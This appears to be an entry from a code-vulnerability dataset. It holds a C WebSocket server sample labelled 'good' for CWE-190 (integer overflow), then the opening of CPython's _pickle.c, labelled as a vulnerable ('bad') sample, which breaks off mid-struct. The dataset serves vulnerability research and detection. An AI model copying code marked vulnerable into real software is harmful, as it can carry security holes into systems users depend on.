{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL || strlen(connection) > UT_WS_SVR_MAX_HEADER_SIZE)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_402_3 |
crossvul-cpp_data_bad_496_0 |
/* Core extension modules are built-in on some platforms (e.g. Windows). */
#ifdef Py_BUILD_CORE
#define Py_BUILD_CORE_BUILTIN
#undef Py_BUILD_CORE
#endif
#include "Python.h"
#include "structmember.h"
PyDoc_STRVAR(pickle_module_doc,
"Optimized C implementation for the Python pickle module.");
/*[clinic input]
module _pickle
class _pickle.Pickler "PicklerObject *" "&Pickler_Type"
class _pickle.PicklerMemoProxy "PicklerMemoProxyObject *" "&PicklerMemoProxyType"
class _pickle.Unpickler "UnpicklerObject *" "&Unpickler_Type"
class _pickle.UnpicklerMemoProxy "UnpicklerMemoProxyObject *" "&UnpicklerMemoProxyType"
[clinic start generated code]*/
/*[clinic end generated code: output=da39a3ee5e6b4b0d input=4b3e113468a58e6c]*/
/* Bump HIGHEST_PROTOCOL when new opcodes are added to the pickle protocol.
Bump DEFAULT_PROTOCOL only when the oldest still supported version of Python
already includes it. */
enum {
HIGHEST_PROTOCOL = 4,
DEFAULT_PROTOCOL = 4
};
/* Pickle opcodes. These must be kept updated with pickle.py.
Extensive docs are in pickletools.py. */
enum opcode {
MARK = '(',
STOP = '.',
POP = '0',
POP_MARK = '1',
DUP = '2',
FLOAT = 'F',
INT = 'I',
BININT = 'J',
BININT1 = 'K',
LONG = 'L',
BININT2 = 'M',
NONE = 'N',
PERSID = 'P',
BINPERSID = 'Q',
REDUCE = 'R',
STRING = 'S',
BINSTRING = 'T',
SHORT_BINSTRING = 'U',
UNICODE = 'V',
BINUNICODE = 'X',
APPEND = 'a',
BUILD = 'b',
GLOBAL = 'c',
DICT = 'd',
EMPTY_DICT = '}',
APPENDS = 'e',
GET = 'g',
BINGET = 'h',
INST = 'i',
LONG_BINGET = 'j',
LIST = 'l',
EMPTY_LIST = ']',
OBJ = 'o',
PUT = 'p',
BINPUT = 'q',
LONG_BINPUT = 'r',
SETITEM = 's',
TUPLE = 't',
EMPTY_TUPLE = ')',
SETITEMS = 'u',
BINFLOAT = 'G',
/* Protocol 2. */
PROTO = '\x80',
NEWOBJ = '\x81',
EXT1 = '\x82',
EXT2 = '\x83',
EXT4 = '\x84',
TUPLE1 = '\x85',
TUPLE2 = '\x86',
TUPLE3 = '\x87',
NEWTRUE = '\x88',
NEWFALSE = '\x89',
LONG1 = '\x8a',
LONG4 = '\x8b',
/* Protocol 3 (Python 3.x) */
BINBYTES = 'B',
SHORT_BINBYTES = 'C',
/* Protocol 4 */
SHORT_BINUNICODE = '\x8c',
BINUNICODE8 = '\x8d',
BINBYTES8 = '\x8e',
EMPTY_SET = '\x8f',
ADDITEMS = '\x90',
FROZENSET = '\x91',
NEWOBJ_EX = '\x92',
STACK_GLOBAL = '\x93',
MEMOIZE = '\x94',
FRAME = '\x95'
};
enum {
/* Keep in synch with pickle.Pickler._BATCHSIZE. This is how many elements
batch_list/dict() pumps out before doing APPENDS/SETITEMS. Nothing will
break if this gets out of synch with pickle.py, but it's unclear that would
help anything either. */
BATCHSIZE = 1000,
/* Nesting limit until Pickler, when running in "fast mode", starts
checking for self-referential data-structures. */
FAST_NESTING_LIMIT = 50,
/* Initial size of the write buffer of Pickler. */
WRITE_BUF_SIZE = 4096,
/* Prefetch size when unpickling (disabled on unpeekable streams) */
PREFETCH = 8192 * 16,
FRAME_SIZE_MIN = 4,
FRAME_SIZE_TARGET = 64 * 1024,
FRAME_HEADER_SIZE = 9
};
/*************************************************************************/
/* State of the pickle module, per PEP 3121. */
typedef struct {
/* Exception classes for pickle. */
PyObject *PickleError;
PyObject *PicklingError;
PyObject *UnpicklingError;
/* copyreg.dispatch_table, {type_object: pickling_function} */
PyObject *dispatch_table;
/* For the extension opcodes EXT1, EXT2 and EXT4. */
/* copyreg._extension_registry, {(module_name, function_name): code} */
PyObject *extension_registry;
/* copyreg._extension_cache, {code: object} */
PyObject *extension_cache;
/* copyreg._inverted_registry, {code: (module_name, function_name)} */
PyObject *inverted_registry;
/* Import mappings for compatibility with Python 2.x */
/* _compat_pickle.NAME_MAPPING,
{(oldmodule, oldname): (newmodule, newname)} */
PyObject *name_mapping_2to3;
/* _compat_pickle.IMPORT_MAPPING, {oldmodule: newmodule} */
PyObject *import_mapping_2to3;
/* Same, but with REVERSE_NAME_MAPPING / REVERSE_IMPORT_MAPPING */
PyObject *name_mapping_3to2;
PyObject *import_mapping_3to2;
/* codecs.encode, used for saving bytes in older protocols */
PyObject *codecs_encode;
/* builtins.getattr, used for saving nested names with protocol < 4 */
PyObject *getattr;
/* functools.partial, used for implementing __newobj_ex__ with protocols
2 and 3 */
PyObject *partial;
} PickleState;
/* Forward declaration of the _pickle module definition. */
static struct PyModuleDef _picklemodule;
/* Given a module object, get its per-module state. */
static PickleState *
_Pickle_GetState(PyObject *module)
{
return (PickleState *)PyModule_GetState(module);
}
/* Find the module instance imported in the currently running sub-interpreter
and get its state. */
static PickleState *
_Pickle_GetGlobalState(void)
{
return _Pickle_GetState(PyState_FindModule(&_picklemodule));
}
/* Clear the given pickle module state. */
static void
_Pickle_ClearState(PickleState *st)
{
Py_CLEAR(st->PickleError);
Py_CLEAR(st->PicklingError);
Py_CLEAR(st->UnpicklingError);
Py_CLEAR(st->dispatch_table);
Py_CLEAR(st->extension_registry);
Py_CLEAR(st->extension_cache);
Py_CLEAR(st->inverted_registry);
Py_CLEAR(st->name_mapping_2to3);
Py_CLEAR(st->import_mapping_2to3);
Py_CLEAR(st->name_mapping_3to2);
Py_CLEAR(st->import_mapping_3to2);
Py_CLEAR(st->codecs_encode);
Py_CLEAR(st->getattr);
Py_CLEAR(st->partial);
}
/* Initialize the given pickle module state. */
static int
_Pickle_InitState(PickleState *st)
{
PyObject *builtins;
PyObject *copyreg = NULL;
PyObject *compat_pickle = NULL;
PyObject *codecs = NULL;
PyObject *functools = NULL;
builtins = PyEval_GetBuiltins();
if (builtins == NULL)
goto error;
st->getattr = PyDict_GetItemString(builtins, "getattr");
if (st->getattr == NULL)
goto error;
Py_INCREF(st->getattr);
copyreg = PyImport_ImportModule("copyreg");
if (!copyreg)
goto error;
st->dispatch_table = PyObject_GetAttrString(copyreg, "dispatch_table");
if (!st->dispatch_table)
goto error;
if (!PyDict_CheckExact(st->dispatch_table)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg.dispatch_table should be a dict, not %.200s",
Py_TYPE(st->dispatch_table)->tp_name);
goto error;
}
st->extension_registry = \
PyObject_GetAttrString(copyreg, "_extension_registry");
if (!st->extension_registry)
goto error;
if (!PyDict_CheckExact(st->extension_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_registry should be a dict, "
"not %.200s", Py_TYPE(st->extension_registry)->tp_name);
goto error;
}
st->inverted_registry = \
PyObject_GetAttrString(copyreg, "_inverted_registry");
if (!st->inverted_registry)
goto error;
if (!PyDict_CheckExact(st->inverted_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._inverted_registry should be a dict, "
"not %.200s", Py_TYPE(st->inverted_registry)->tp_name);
goto error;
}
st->extension_cache = PyObject_GetAttrString(copyreg, "_extension_cache");
if (!st->extension_cache)
goto error;
if (!PyDict_CheckExact(st->extension_cache)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_cache should be a dict, "
"not %.200s", Py_TYPE(st->extension_cache)->tp_name);
goto error;
}
Py_CLEAR(copyreg);
/* Load the 2.x -> 3.x stdlib module mapping tables */
compat_pickle = PyImport_ImportModule("_compat_pickle");
if (!compat_pickle)
goto error;
st->name_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "NAME_MAPPING");
if (!st->name_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->name_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING should be a dict, not %.200s",
Py_TYPE(st->name_mapping_2to3)->tp_name);
goto error;
}
st->import_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "IMPORT_MAPPING");
if (!st->import_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->import_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_2to3)->tp_name);
goto error;
}
/* ... and the 3.x -> 2.x mapping tables */
st->name_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_NAME_MAPPING");
if (!st->name_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->name_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->name_mapping_3to2)->tp_name);
goto error;
}
st->import_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_IMPORT_MAPPING");
if (!st->import_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->import_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_3to2)->tp_name);
goto error;
}
Py_CLEAR(compat_pickle);
codecs = PyImport_ImportModule("codecs");
if (codecs == NULL)
goto error;
st->codecs_encode = PyObject_GetAttrString(codecs, "encode");
if (st->codecs_encode == NULL) {
goto error;
}
if (!PyCallable_Check(st->codecs_encode)) {
PyErr_Format(PyExc_RuntimeError,
"codecs.encode should be a callable, not %.200s",
Py_TYPE(st->codecs_encode)->tp_name);
goto error;
}
Py_CLEAR(codecs);
functools = PyImport_ImportModule("functools");
if (!functools)
goto error;
st->partial = PyObject_GetAttrString(functools, "partial");
if (!st->partial)
goto error;
Py_CLEAR(functools);
return 0;
error:
Py_CLEAR(copyreg);
Py_CLEAR(compat_pickle);
Py_CLEAR(codecs);
Py_CLEAR(functools);
_Pickle_ClearState(st);
return -1;
}
/* Helper for calling a function with a single argument quickly.
This function steals the reference of the given argument. */
static PyObject *
_Pickle_FastCall(PyObject *func, PyObject *obj)
{
PyObject *result;
result = PyObject_CallFunctionObjArgs(func, obj, NULL);
Py_DECREF(obj);
return result;
}
/*************************************************************************/
/* Retrieve and deconstruct a method for avoiding a reference cycle
(pickler -> bound method of pickler -> pickler) */
static int
init_method_ref(PyObject *self, _Py_Identifier *name,
PyObject **method_func, PyObject **method_self)
{
PyObject *func, *func2;
int ret;
/* *method_func and *method_self should be consistent. All refcount decrements
should be occurred after setting *method_self and *method_func. */
ret = _PyObject_LookupAttrId(self, name, &func);
if (func == NULL) {
*method_self = NULL;
Py_CLEAR(*method_func);
return ret;
}
if (PyMethod_Check(func) && PyMethod_GET_SELF(func) == self) {
/* Deconstruct a bound Python method */
func2 = PyMethod_GET_FUNCTION(func);
Py_INCREF(func2);
*method_self = self; /* borrowed */
Py_XSETREF(*method_func, func2);
Py_DECREF(func);
return 0;
}
else {
*method_self = NULL;
Py_XSETREF(*method_func, func);
return 0;
}
}
/* Bind a method if it was deconstructed */
static PyObject *
reconstruct_method(PyObject *func, PyObject *self)
{
if (self) {
return PyMethod_New(func, self);
}
else {
Py_INCREF(func);
return func;
}
}
static PyObject *
call_method(PyObject *func, PyObject *self, PyObject *obj)
{
if (self) {
return PyObject_CallFunctionObjArgs(func, self, obj, NULL);
}
else {
return PyObject_CallFunctionObjArgs(func, obj, NULL);
}
}
/*************************************************************************/
/* Internal data type used as the unpickling stack. */
typedef struct {
PyObject_VAR_HEAD
PyObject **data;
int mark_set; /* is MARK set? */
Py_ssize_t fence; /* position of top MARK or 0 */
Py_ssize_t allocated; /* number of slots in data allocated */
} Pdata;
static void
Pdata_dealloc(Pdata *self)
{
Py_ssize_t i = Py_SIZE(self);
while (--i >= 0) {
Py_DECREF(self->data[i]);
}
PyMem_FREE(self->data);
PyObject_Del(self);
}
static PyTypeObject Pdata_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pdata", /*tp_name*/
sizeof(Pdata), /*tp_basicsize*/
sizeof(PyObject *), /*tp_itemsize*/
(destructor)Pdata_dealloc, /*tp_dealloc*/
};
static PyObject *
Pdata_New(void)
{
Pdata *self;
if (!(self = PyObject_New(Pdata, &Pdata_Type)))
return NULL;
Py_SIZE(self) = 0;
self->mark_set = 0;
self->fence = 0;
self->allocated = 8;
self->data = PyMem_MALLOC(self->allocated * sizeof(PyObject *));
if (self->data)
return (PyObject *)self;
Py_DECREF(self);
return PyErr_NoMemory();
}
/* Retain only the initial clearto items. If clearto >= the current
* number of items, this is a (non-erroneous) NOP.
*/
static int
Pdata_clear(Pdata *self, Py_ssize_t clearto)
{
Py_ssize_t i = Py_SIZE(self);
assert(clearto >= self->fence);
if (clearto >= i)
return 0;
while (--i >= clearto) {
Py_CLEAR(self->data[i]);
}
Py_SIZE(self) = clearto;
return 0;
}
static int
Pdata_grow(Pdata *self)
{
PyObject **data = self->data;
size_t allocated = (size_t)self->allocated;
size_t new_allocated;
new_allocated = (allocated >> 3) + 6;
/* check for integer overflow */
if (new_allocated > (size_t)PY_SSIZE_T_MAX - allocated)
goto nomemory;
new_allocated += allocated;
PyMem_RESIZE(data, PyObject *, new_allocated);
if (data == NULL)
goto nomemory;
self->data = data;
self->allocated = (Py_ssize_t)new_allocated;
return 0;
nomemory:
PyErr_NoMemory();
return -1;
}
static int
Pdata_stack_underflow(Pdata *self)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
self->mark_set ?
"unexpected MARK found" :
"unpickling stack underflow");
return -1;
}
/* D is a Pdata*. Pop the topmost element and store it into V, which
* must be an lvalue holding PyObject*. On stack underflow, UnpicklingError
* is raised and V is set to NULL.
*/
static PyObject *
Pdata_pop(Pdata *self)
{
if (Py_SIZE(self) <= self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
return self->data[--Py_SIZE(self)];
}
#define PDATA_POP(D, V) do { (V) = Pdata_pop((D)); } while (0)
static int
Pdata_push(Pdata *self, PyObject *obj)
{
if (Py_SIZE(self) == self->allocated && Pdata_grow(self) < 0) {
return -1;
}
self->data[Py_SIZE(self)++] = obj;
return 0;
}
/* Push an object on stack, transferring its ownership to the stack. */
#define PDATA_PUSH(D, O, ER) do { \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
/* Push an object on stack, adding a new reference to the object. */
#define PDATA_APPEND(D, O, ER) do { \
Py_INCREF((O)); \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
static PyObject *
Pdata_poptuple(Pdata *self, Py_ssize_t start)
{
PyObject *tuple;
Py_ssize_t len, i, j;
if (start < self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
len = Py_SIZE(self) - start;
tuple = PyTuple_New(len);
if (tuple == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyTuple_SET_ITEM(tuple, j, self->data[i]);
Py_SIZE(self) = start;
return tuple;
}
static PyObject *
Pdata_poplist(Pdata *self, Py_ssize_t start)
{
PyObject *list;
Py_ssize_t len, i, j;
len = Py_SIZE(self) - start;
list = PyList_New(len);
if (list == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyList_SET_ITEM(list, j, self->data[i]);
Py_SIZE(self) = start;
return list;
}
typedef struct {
PyObject *me_key;
Py_ssize_t me_value;
} PyMemoEntry;
typedef struct {
Py_ssize_t mt_mask;
Py_ssize_t mt_used;
Py_ssize_t mt_allocated;
PyMemoEntry *mt_table;
} PyMemoTable;
typedef struct PicklerObject {
PyObject_HEAD
PyMemoTable *memo; /* Memo table, keep track of the seen
objects to support self-referential objects
pickling. */
PyObject *pers_func; /* persistent_id() method, can be NULL */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
PyObject *dispatch_table; /* private dispatch_table, can be NULL */
PyObject *write; /* write() method of the output stream. */
PyObject *output_buffer; /* Write into a local bytearray buffer before
flushing to the stream. */
Py_ssize_t output_len; /* Length of output_buffer. */
Py_ssize_t max_output_len; /* Allocation size of output_buffer. */
int proto; /* Pickle protocol number, >= 0 */
int bin; /* Boolean, true if proto > 0 */
int framing; /* True when framing is enabled, proto >= 4 */
Py_ssize_t frame_start; /* Position in output_buffer where the
current frame begins. -1 if there
is no frame currently open. */
Py_ssize_t buf_size; /* Size of the current buffered pickle data */
int fast; /* Enable fast mode if set to a true value.
The fast mode disable the usage of memo,
therefore speeding the pickling process by
not generating superfluous PUT opcodes. It
should not be used if with self-referential
objects. */
int fast_nesting;
int fix_imports; /* Indicate whether Pickler should fix
the name of globals for Python 2.x. */
PyObject *fast_memo;
} PicklerObject;
typedef struct UnpicklerObject {
PyObject_HEAD
Pdata *stack; /* Pickle data stack, store unpickled objects. */
/* The unpickler memo is just an array of PyObject *s. Using a dict
is unnecessary, since the keys are contiguous ints. */
PyObject **memo;
Py_ssize_t memo_size; /* Capacity of the memo array */
Py_ssize_t memo_len; /* Number of objects in the memo */
PyObject *pers_func; /* persistent_load() method, can be NULL. */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
Py_buffer buffer;
char *input_buffer;
char *input_line;
Py_ssize_t input_len;
Py_ssize_t next_read_idx;
Py_ssize_t prefetched_idx; /* index of first prefetched byte */
PyObject *read; /* read() method of the input stream. */
